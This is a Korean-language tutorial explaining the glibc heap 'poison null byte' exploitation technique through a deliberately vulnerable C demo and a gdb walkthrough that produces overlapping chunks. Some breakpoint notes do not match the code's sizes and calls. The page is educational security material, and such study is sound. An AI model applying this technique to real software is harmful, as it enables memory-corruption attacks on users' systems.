Page tree
Skip to end of metadata
Go to start of metadata

Excuse the ads! We need some help to keep our site up.

List

Conditions

  • 해당 기술은 다음과 같은 조건에서 동작합니다.
    • 공격자에 의해 다음과 같은 Heap 영역을 할당,해제 할 수 있어야 합니다.
      • 0x200 이상의 Heap 영역 : 공격 대상 Heap 영역
      • Fast bin 이상의 Heap 영역(Heap size : 0x80 이상) : 공격 대상 영역에 할당 Heap 영역
    • 공격자에 의해 Free chunk의 size 영역에 1byte를 Null로 변경 할 수 있어야 합니다.
    • 공격자에 의해 Free chunk의 size 보다 작은 Heap 영역을 2개 할당 할 수 있어야 합니다.
      • Fast chunk는 사용할 수 없습니다.

Exploit plan

  • 다음과 같은 방법으로 공격할 수 있습니다.
    • 3개의 Heap 영역을 할당합니다.

      • 할당 받을 Heap영역의 크기 : Heap1(0x80), Heap2(0x200), Heap3(0x80)
    • 다음과 같은 영역에 "Header의 size영역에 1byte를 Null로 변경한 값"을 저장합니다.
      • "Heap2의 Header주소 + Heap size에 1byte를 Null로 변경한 값" 영역
    • Heap2 영역을 해제합니다.
    • Free chunk의 size 영역에 1byte를 null로 변경합니다.
      • Ex) 0x211 → 0x200
    • 변경된 Free chunk의 영역 안에 생성 가능한 크기의 Heap 영역을 2개 할당 받습니다.
      • 할당 받을 Heap영역의 크기 : Heap4(0x80), Heap5(0x80)
    • Heap4 영역을 해제 합니다.
    • Heap3 영역을 해제합니다.
    • "Heap4 크기 + Heap5 크기" 이상의 Heap 영역을 할당 받습니다.
      • 할당 받은 영역으로 인해 Heap5 영역의 값을 덮어쓸수 있습니다.

chunksize(P) != prev_size (next_chunk(P)

  • Heap 영역 내에 "size & 0xff00" 값을 저장하는 이유는 다음과 같습니다.
    • chunk의 size값만 null byte로 변경할 경우 "corrupted size vs. prev_size" 에러가 발생합니다.
    • 해당 에러는 unlink() 함수에서 chunk의 size값과 다음 chunk의 prev_size값이 같은지 확인하고 있기 때문입니다.
  • 해당 코드를 우회하기 위해 Fake prev_size가 필요합니다.
#define unlink(AV, P, BK, FD)
/* Take a chunk off a bin list */
#define unlink(AV, P, BK, FD) {                                            \
    if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      \
      malloc_printerr (check_action, "corrupted size vs. prev_size", P, AV);  \

Example

Files

Source code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>

int main()
{	
	char *buf1 = malloc(0x80);
	char *buf2 = malloc(0x200);
	char *buf3 = malloc(0x80);

	scanf("%512s",buf2);

	free(buf2);

	scanf("%136s",buf1);	

	char *buf4 = malloc(0x80);
	char *buf5 = malloc(0x80);

	memset(buf5,'A',0x80);

	free(buf4);
	free(buf3);
	
	char *buf6 = malloc(0x280);
	memset(buf6,'B',0x280);
}

Exploit flow

Poison null byte

Debugging

  • 다음과 같이 Break point를 설정합니다.

    • 0x400670 : scanf("%256s",buf2) 호출

    • 0x400681 : free(buf2) 호출 후 

    • 0x400697 : scanf("%128s",buf1) 호출 후 
    • 0x4006a1 : malloc(0x80) 호출 후 

    • 0x4006af : malloc(0x80) 호출 후 

    • 0x4006c9 : memset(buf5,'A',0x80) 호출 후 

    • 0x4006d5 : free(buf4) 호출 후

    • 0x4006e1 : free(buf5) 호출 후

    • 0x4006eb : malloc(0x180) 호출 후

    • 0x400705 : memset(buf6,'B',0x180) 호출 후

Break points
gdb-peda$ b *0x0000000000400670
Breakpoint 1 at 0x400670
gdb-peda$ b *0x0000000000400681
Breakpoint 2 at 0x400681
gdb-peda$ b *0x0000000000400697
Breakpoint 3 at 0x400697
gdb-peda$ b *0x00000000004006a1
Breakpoint 4 at 0x4006a1
gdb-peda$ b *0x00000000004006af
Breakpoint 5 at 0x4006af
gdb-peda$ b *0x00000000004006c9
Breakpoint 6 at 0x4006c9
gdb-peda$ b *0x00000000004006d5
Breakpoint 7 at 0x4006d5
gdb-peda$ b *0x00000000004006e1
Breakpoint 8 at 0x4006e1
gdb-peda$ b *0x00000000004006eb
Breakpoint 9 at 0x4006eb
gdb-peda$ b *0x0000000000400705
Breakpoint 10 at 0x400705
gdb-peda$ r
Starting program: /home/lazenca0x0/Documents/def/poisonNullByte 
  • 다음과 같이 Heap 영역이 할당되었습니다.
    • malloc(0x80) : 0x602010
    • malloc(0x100) : 0x6020a0
    • malloc(0x80) : 0x6022b0
  • 사용자 입력 값에 의해 Fake prev_size를 생성할 수 있습니다.
    • Fake prev_size 주소 : buf2의 Header 주소(0x602090) + (buf2 Header의 size(0x211) & null byte(0xff00)) = 0x602290
    • Fake prev_size 값 : buf2 Header의 size(0x211) & null byte(0xff00) = 0x200
Wrote a fake prev_size
Breakpoint 1, 0x0000000000400670 in main ()

gdb-peda$ x/104gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000091
0x602010:	0x0000000000000000	0x0000000000000000
...
0x602080:	0x0000000000000000	0x0000000000000000
0x602090:	0x0000000000000000	0x0000000000000211
0x6020a0:	0x0000000000000000	0x0000000000000000
...
0x602290:	0x0000000000000000	0x0000000000000000
0x6022a0:	0x0000000000000000	0x0000000000000091
0x6022b0:	0x0000000000000000	0x0000000000000000
...
0x602320:	0x0000000000000000	0x0000000000000000
0x602330:	0x0000000000000000	0x0000000000020cd1
gdb-peda$ ni
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

0x0000000000400675 in main ()
gdb-peda$ x/66gx 0x6020a0
0x6020a0:	0x4343434343434343	0x4343434343434343
0x6020b0:	0x4343434343434343	0x4343434343434343
0x6020c0:	0x4343434343434343	0x4343434343434343
0x6020d0:	0x4343434343434343	0x4343434343434343
0x6020e0:	0x4343434343434343	0x4343434343434343
0x6020f0:	0x4343434343434343	0x4343434343434343
0x602100:	0x4343434343434343	0x4343434343434343
0x602110:	0x4343434343434343	0x4343434343434343
0x602120:	0x4343434343434343	0x4343434343434343
0x602130:	0x4343434343434343	0x4343434343434343
0x602140:	0x4343434343434343	0x4343434343434343
0x602150:	0x4343434343434343	0x4343434343434343
0x602160:	0x4343434343434343	0x4343434343434343
0x602170:	0x4343434343434343	0x4343434343434343
0x602180:	0x4343434343434343	0x4343434343434343
0x602190:	0x4343434343434343	0x4343434343434343
0x6021a0:	0x4343434343434343	0x4343434343434343
0x6021b0:	0x4343434343434343	0x4343434343434343
0x6021c0:	0x4343434343434343	0x4343434343434343
0x6021d0:	0x4343434343434343	0x4343434343434343
0x6021e0:	0x4343434343434343	0x4343434343434343
0x6021f0:	0x4343434343434343	0x4343434343434343
0x602200:	0x4343434343434343	0x4343434343434343
0x602210:	0x4343434343434343	0x4343434343434343
0x602220:	0x4343434343434343	0x4343434343434343
0x602230:	0x4343434343434343	0x4343434343434343
0x602240:	0x4343434343434343	0x4343434343434343
0x602250:	0x4343434343434343	0x4343434343434343
0x602260:	0x4343434343434343	0x4343434343434343
0x602270:	0x4343434343434343	0x4343434343434343
0x602280:	0x4343434343434343	0x4343434343434343
0x602290:	0x4343434343434343	0x4343434343434343
0x6022a0:	0x0000000000000000	0x0000000000000091
gdb-peda$ set *0x602290 = 0x200
gdb-peda$ set *0x602294 = 0x0
gdb-peda$ x/gx 0x602290
0x602290:	0x0000000000000200
gdb-peda$
  • 다음과 같이 free chunk의 size영역에 1byte를 null로 변경 할 수 있습니다.
    • 사용자 입력 값으로 문자 'D' 를 136개 입력 하였습니다.
    • size 값이 0x211 에서 0x200으로 변경되었습니다.
Overwrite a null byte in the size area of Free Chunk
gdb-peda$ c
Continuing.

Breakpoint 2, 0x0000000000400681 in main ()
gdb-peda$ x/6gx 0x602090
0x602090:	0x0000000000000000	0x0000000000000211
0x6020a0:	0x00007ffff7dd37b8	0x00007ffff7dd37b8
0x6020b0:	0x4343434343434343	0x4343434343434343
gdb-peda$ 

gdb-peda$ p main_arena.bins[1]
$1 = (mchunkptr) 0x602090
gdb-peda$ c
Continuing.
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD

Breakpoint 3, 0x0000000000400697 in main ()
gdb-peda$ x/24gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000091
0x602010:	0x4444444444444444	0x4444444444444444
0x602020:	0x4444444444444444	0x4444444444444444
0x602030:	0x4444444444444444	0x4444444444444444
0x602040:	0x4444444444444444	0x4444444444444444
0x602050:	0x4444444444444444	0x4444444444444444
0x602060:	0x4444444444444444	0x4444444444444444
0x602070:	0x4444444444444444	0x4444444444444444
0x602080:	0x4444444444444444	0x4444444444444444
0x602090:	0x4444444444444444	0x0000000000000200
0x6020a0:	0x00007ffff7dd37b8	0x00007ffff7dd37b8
0x6020b0:	0x4343434343434343	0x4343434343434343
gdb-peda$
  • 다음과 같이 Heap 영역을 할당 받습니다.
    • 할당 받은 Heap 영역은 해제된 buf2 영역 내에 할당됩니다.
    • 할당된 영역 : 0x6020a0, 0x602130

malloc(0x80),malloc(0x80)
gdb-peda$ c
Continuing.

Breakpoint 4, 0x00000000004006a1 in main ()
gdb-peda$ i r rax
rax            0x6020a0	0x6020a0

gdb-peda$ p main_arena.bins[1]
$2 = (mchunkptr) 0x602120
gdb-peda$ c
Continuing.

Breakpoint 5, 0x00000000004006af in main ()
gdb-peda$ i r rax
rax            0x602130	0x602130
gdb-peda$ p main_arena.bins[1]
$3 = (mchunkptr) 0x6021b0
gdb-peda$ 
  • 다음과 같이 buf5 영역에 문자 'A' 128개 저장합니다.
memset(buf5,'A',0x80)
gdb-peda$ c
Continuing.
Breakpoint 6, 0x00000000004006c9 in main ()
gdb-peda$ x/18gx 0x602130
0x602130:	0x4141414141414141	0x4141414141414141
0x602140:	0x4141414141414141	0x4141414141414141
0x602150:	0x4141414141414141	0x4141414141414141
0x602160:	0x4141414141414141	0x4141414141414141
0x602170:	0x4141414141414141	0x4141414141414141
0x602180:	0x4141414141414141	0x4141414141414141
0x602190:	0x4141414141414141	0x4141414141414141
0x6021a0:	0x4141414141414141	0x4141414141414141
0x6021b0:	0x4343434343434343	0x00000000000000e1
gdb-peda$ 
  • 다음과 같이 buf4 영역을 해제합니다.
    • 이로 인해 다음과 같이 free chunk의 값들에 변화가 발생하게 됩니다.
      • buf4 Free chunk 의 fd : 0x6021b0
      • 0x6021b0 Free chunk의 bk : 0x602090

free(buf4)
gdb-peda$ c
Continuing.

Breakpoint 7, 0x00000000004006d5 in main ()
gdb-peda$ x/86gx 0x602090
0x602090:	0x4444444444444444	0x0000000000000091
0x6020a0:	0x00000000006021b0	0x00007ffff7dd37b8
0x6020b0:	0x4343434343434343	0x4343434343434343
0x6020c0:	0x4343434343434343	0x4343434343434343
0x6020d0:	0x4343434343434343	0x4343434343434343
0x6020e0:	0x4343434343434343	0x4343434343434343
0x6020f0:	0x4343434343434343	0x4343434343434343
0x602100:	0x4343434343434343	0x4343434343434343
0x602110:	0x4343434343434343	0x4343434343434343
0x602120:	0x0000000000000090	0x0000000000000090
0x602130:	0x4141414141414141	0x4141414141414141
0x602140:	0x4141414141414141	0x4141414141414141
0x602150:	0x4141414141414141	0x4141414141414141
0x602160:	0x4141414141414141	0x4141414141414141
0x602170:	0x4141414141414141	0x4141414141414141
0x602180:	0x4141414141414141	0x4141414141414141
0x602190:	0x4141414141414141	0x4141414141414141
0x6021a0:	0x4141414141414141	0x4141414141414141
0x6021b0:	0x4343434343434343	0x00000000000000e1
0x6021c0:	0x00007ffff7dd37b8	0x0000000000602090
0x6021d0:	0x4343434343434343	0x4343434343434343
0x6021e0:	0x4343434343434343	0x4343434343434343
0x6021f0:	0x4343434343434343	0x4343434343434343
0x602200:	0x4343434343434343	0x4343434343434343
0x602210:	0x4343434343434343	0x4343434343434343
0x602220:	0x4343434343434343	0x4343434343434343
0x602230:	0x4343434343434343	0x4343434343434343
0x602240:	0x4343434343434343	0x4343434343434343
0x602250:	0x4343434343434343	0x4343434343434343
0x602260:	0x4343434343434343	0x4343434343434343
0x602270:	0x4343434343434343	0x4343434343434343
0x602280:	0x4343434343434343	0x4343434343434343
0x602290:	0x00000000000000e0	0x4343434343434343
0x6022a0:	0x0000000000000210	0x0000000000000090
0x6022b0:	0x0000000000000000	0x0000000000000000
0x6022c0:	0x0000000000000000	0x0000000000000000
0x6022d0:	0x0000000000000000	0x0000000000000000
0x6022e0:	0x0000000000000000	0x0000000000000000
0x6022f0:	0x0000000000000000	0x0000000000000000
0x602300:	0x0000000000000000	0x0000000000000000
0x602310:	0x0000000000000000	0x0000000000000000
0x602320:	0x0000000000000000	0x0000000000000000
0x602330:	0x0000000000000000	0x0000000000020cd1
gdb-peda$ 
  • 다음과 같이 buf3 영역 해제하면 Top chunk 영역이 변경됩니다.
    • Top chunk 영역: 0x602098
    • Top chunk 영역이 0x602098 으로 변경된 이유는 다음과 같습니다.
      • buf3의 prev_size의 값이 0x210이기 때문에 0x6021b8에 Top chunk가  생성되지 않습니다.
      • buf3의 이전 Chunk 위치 : buf3의 Allocated chunk address(0x6022a0) - buf3의 prev_size(0x210) = 0x602090
free(buf3)
gdb-peda$ c
Continuing.
Breakpoint 8, 0x00000000004006e1 in main ()

gdb-peda$ x/86gx 0x602090
0x602090:	0x4444444444444444	0x0000000000020f71
0x6020a0:	0x00000000006021b0	0x00007ffff7dd37b8
0x6020b0:	0x4343434343434343	0x4343434343434343
0x6020c0:	0x4343434343434343	0x4343434343434343
0x6020d0:	0x4343434343434343	0x4343434343434343
0x6020e0:	0x4343434343434343	0x4343434343434343
0x6020f0:	0x4343434343434343	0x4343434343434343
0x602100:	0x4343434343434343	0x4343434343434343
0x602110:	0x4343434343434343	0x4343434343434343
0x602120:	0x0000000000000090	0x0000000000000090
0x602130:	0x4141414141414141	0x4141414141414141
0x602140:	0x4141414141414141	0x4141414141414141
0x602150:	0x4141414141414141	0x4141414141414141
0x602160:	0x4141414141414141	0x4141414141414141
0x602170:	0x4141414141414141	0x4141414141414141
0x602180:	0x4141414141414141	0x4141414141414141
0x602190:	0x4141414141414141	0x4141414141414141
0x6021a0:	0x4141414141414141	0x4141414141414141
0x6021b0:	0x4343434343434343	0x00000000000000e1
0x6021c0:	0x00007ffff7dd37b8	0x00007ffff7dd37b8
0x6021d0:	0x4343434343434343	0x4343434343434343
0x6021e0:	0x4343434343434343	0x4343434343434343
0x6021f0:	0x4343434343434343	0x4343434343434343
0x602200:	0x4343434343434343	0x4343434343434343
0x602210:	0x4343434343434343	0x4343434343434343
0x602220:	0x4343434343434343	0x4343434343434343
0x602230:	0x4343434343434343	0x4343434343434343
0x602240:	0x4343434343434343	0x4343434343434343
0x602250:	0x4343434343434343	0x4343434343434343
0x602260:	0x4343434343434343	0x4343434343434343
0x602270:	0x4343434343434343	0x4343434343434343
0x602280:	0x4343434343434343	0x4343434343434343
0x602290:	0x00000000000000e0	0x4343434343434343
0x6022a0:	0x0000000000000210	0x0000000000000090
0x6022b0:	0x0000000000000000	0x0000000000000000
0x6022c0:	0x0000000000000000	0x0000000000000000
0x6022d0:	0x0000000000000000	0x0000000000000000
0x6022e0:	0x0000000000000000	0x0000000000000000
0x6022f0:	0x0000000000000000	0x0000000000000000
0x602300:	0x0000000000000000	0x0000000000000000
0x602310:	0x0000000000000000	0x0000000000000000
0x602320:	0x0000000000000000	0x0000000000000000
0x602330:	0x0000000000000000	0x0000000000020cd1
gdb-peda$ 
  • 다음과 같이 buf5영역을 덮어쓰는 Heap 영역을 할당 받을 수 있습니다.
    • 할당 받은 영역 : 0x6020a0
    • 할당 받은 크기 : 0x290
malloc(0x280)
gdb-peda$ c
Continuing.

Breakpoint 9, 0x00000000004006eb in main ()
gdb-peda$ i r rax
rax            0x6020a0	0x6020a0

gdb-peda$ x/86gx 0x602090
0x602090:	0x4444444444444444	0x0000000000000291
0x6020a0:	0x00000000006021b0	0x00007ffff7dd37b8
0x6020b0:	0x4343434343434343	0x4343434343434343
0x6020c0:	0x4343434343434343	0x4343434343434343
0x6020d0:	0x4343434343434343	0x4343434343434343
0x6020e0:	0x4343434343434343	0x4343434343434343
0x6020f0:	0x4343434343434343	0x4343434343434343
0x602100:	0x4343434343434343	0x4343434343434343
0x602110:	0x4343434343434343	0x4343434343434343
0x602120:	0x0000000000000090	0x0000000000000090
0x602130:	0x4141414141414141	0x4141414141414141
0x602140:	0x4141414141414141	0x4141414141414141
0x602150:	0x4141414141414141	0x4141414141414141
0x602160:	0x4141414141414141	0x4141414141414141
0x602170:	0x4141414141414141	0x4141414141414141
0x602180:	0x4141414141414141	0x4141414141414141
0x602190:	0x4141414141414141	0x4141414141414141
0x6021a0:	0x4141414141414141	0x4141414141414141
0x6021b0:	0x4343434343434343	0x00000000000000e1
0x6021c0:	0x00007ffff7dd3888	0x00007ffff7dd3888
0x6021d0:	0x4343434343434343	0x4343434343434343
0x6021e0:	0x4343434343434343	0x4343434343434343
0x6021f0:	0x4343434343434343	0x4343434343434343
0x602200:	0x4343434343434343	0x4343434343434343
0x602210:	0x4343434343434343	0x4343434343434343
0x602220:	0x4343434343434343	0x4343434343434343
0x602230:	0x4343434343434343	0x4343434343434343
0x602240:	0x4343434343434343	0x4343434343434343
0x602250:	0x4343434343434343	0x4343434343434343
0x602260:	0x4343434343434343	0x4343434343434343
0x602270:	0x4343434343434343	0x4343434343434343
0x602280:	0x4343434343434343	0x4343434343434343
0x602290:	0x00000000000000e0	0x4343434343434343
0x6022a0:	0x0000000000000210	0x0000000000000090
0x6022b0:	0x0000000000000000	0x0000000000000000
0x6022c0:	0x0000000000000000	0x0000000000000000
0x6022d0:	0x0000000000000000	0x0000000000000000
0x6022e0:	0x0000000000000000	0x0000000000000000
0x6022f0:	0x0000000000000000	0x0000000000000000
0x602300:	0x0000000000000000	0x0000000000000000
0x602310:	0x0000000000000000	0x0000000000000000
0x602320:	0x0000000000000000	0x0000000000020ce1
0x602330:	0x0000000000000000	0x0000000000020cd1
gdb-peda$ 
  • 할당받은 영역에 값을 저장해 buf5 영역을 덮어쓸수 있습니다.
memset(buf6,'B',0x280)
gdb-peda$ c
Continuing.
Breakpoint 10, 0x0000000000400705 in main ()

gdb-peda$ x/86gx 0x602090
0x602090:	0x4444444444444444	0x0000000000000291
0x6020a0:	0x4242424242424242	0x4242424242424242
0x6020b0:	0x4242424242424242	0x4242424242424242
0x6020c0:	0x4242424242424242	0x4242424242424242
0x6020d0:	0x4242424242424242	0x4242424242424242
0x6020e0:	0x4242424242424242	0x4242424242424242
0x6020f0:	0x4242424242424242	0x4242424242424242
0x602100:	0x4242424242424242	0x4242424242424242
0x602110:	0x4242424242424242	0x4242424242424242
0x602120:	0x4242424242424242	0x4242424242424242
0x602130:	0x4242424242424242	0x4242424242424242
0x602140:	0x4242424242424242	0x4242424242424242
0x602150:	0x4242424242424242	0x4242424242424242
0x602160:	0x4242424242424242	0x4242424242424242
0x602170:	0x4242424242424242	0x4242424242424242
0x602180:	0x4242424242424242	0x4242424242424242
0x602190:	0x4242424242424242	0x4242424242424242
0x6021a0:	0x4242424242424242	0x4242424242424242
0x6021b0:	0x4242424242424242	0x4242424242424242
0x6021c0:	0x4242424242424242	0x4242424242424242
0x6021d0:	0x4242424242424242	0x4242424242424242
0x6021e0:	0x4242424242424242	0x4242424242424242
0x6021f0:	0x4242424242424242	0x4242424242424242
0x602200:	0x4242424242424242	0x4242424242424242
0x602210:	0x4242424242424242	0x4242424242424242
0x602220:	0x4242424242424242	0x4242424242424242
0x602230:	0x4242424242424242	0x4242424242424242
0x602240:	0x4242424242424242	0x4242424242424242
0x602250:	0x4242424242424242	0x4242424242424242
0x602260:	0x4242424242424242	0x4242424242424242
0x602270:	0x4242424242424242	0x4242424242424242
0x602280:	0x4242424242424242	0x4242424242424242
0x602290:	0x4242424242424242	0x4242424242424242
0x6022a0:	0x4242424242424242	0x4242424242424242
0x6022b0:	0x4242424242424242	0x4242424242424242
0x6022c0:	0x4242424242424242	0x4242424242424242
0x6022d0:	0x4242424242424242	0x4242424242424242
0x6022e0:	0x4242424242424242	0x4242424242424242
0x6022f0:	0x4242424242424242	0x4242424242424242
0x602300:	0x4242424242424242	0x4242424242424242
0x602310:	0x4242424242424242	0x4242424242424242
0x602320:	0x0000000000000000	0x0000000000020ce1
0x602330:	0x0000000000000000	0x0000000000020cd1
gdb-peda$ 

Related information